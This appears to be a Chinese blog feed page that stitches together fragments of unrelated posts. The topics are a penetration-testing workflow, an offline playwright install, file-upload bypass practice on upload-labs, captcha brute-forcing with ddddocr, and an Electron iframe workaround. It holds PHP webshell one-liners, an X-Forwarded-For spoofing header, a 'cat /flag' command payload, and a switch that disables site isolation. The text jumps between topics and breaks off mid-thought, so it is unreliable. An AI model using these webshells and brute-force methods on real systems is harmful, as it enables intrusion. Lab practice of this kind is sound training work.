互联网渗透的流程
信息收集->突破边界->横向移动
信息收集
指纹识别
Wappalyzer
浏览器插件
Ehole
内置指纹规则,识别CMS,可自行添加规则
事情是这样的,因为工作的重复率太高,我不得不开发一些脚本来 摸鱼 提高工作效率
但是问题是这样的
我在的单位内外网是隔离的,我所在的分支机构没有开发人员,总部有研发中心,但是并不会理会我们这些分支机构
内网的npm
私有库有一个很老的playwright@1.23.4
版本,而我的脚本需要用到一些比较新的特性
我拥有的设备
1 | 内网机: |
而不同版本的playwright
依赖的webdriver
又不一样
而我集齐了windows
,mac
,linux
三种设备。。。
这就意味着我不太好下载对应版本的ms-playwright
(总不能为了下载对应的webdriver
去装个虚拟机吧)
文件上传是个经典问题
推荐靶场:upload-labs
我们可以在这个靶场中进行文件上传绕过的练习
先说webshell
,我们写个一句话木马先
这里留个大哥若干年前的总结 webshell一句话木马大全
接下来我们聊聊文件上传的漏洞
直接一句话木马上传就完事了
打开开发者工具,提交文件,看是否存在网络请求
对于带验证码的爆破,需要对验证码进行识别
可以使用captcha-killer-modified搭配Burp
进行爆破
同时推荐ddddocr
现在是2023年9月7日,Pillow==9.5.0
当前的ddddocr
并未对版本进行兼容
我改了两个docker,有需要可以直接拉取部署
1 | # centos |
验证码填写
1 | POST /ocr/b64/text HTTP/1.1 |
1 | X-Forwarded-For:127.0.0.1 |
postform
,&符分割,System里面可以任意写
1 | eval(system($_POST['cmd'])); |
1 | password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag |
postform
,&符分割,System里面可以任意写
1 | eval($_POST['cmd']); |
一个偶然的情况,帮一个朋友写个小工具
需要内嵌用到iframe,并使用document提取其中的一些dom元素
好像是这个,记不清楚了=。=
1 | Blocked a frame with origin "***" form accessing a cross-origin frame. |
入口添加
1 | app.commandLine.appendSwitch('disable-site-isolation-trials'); |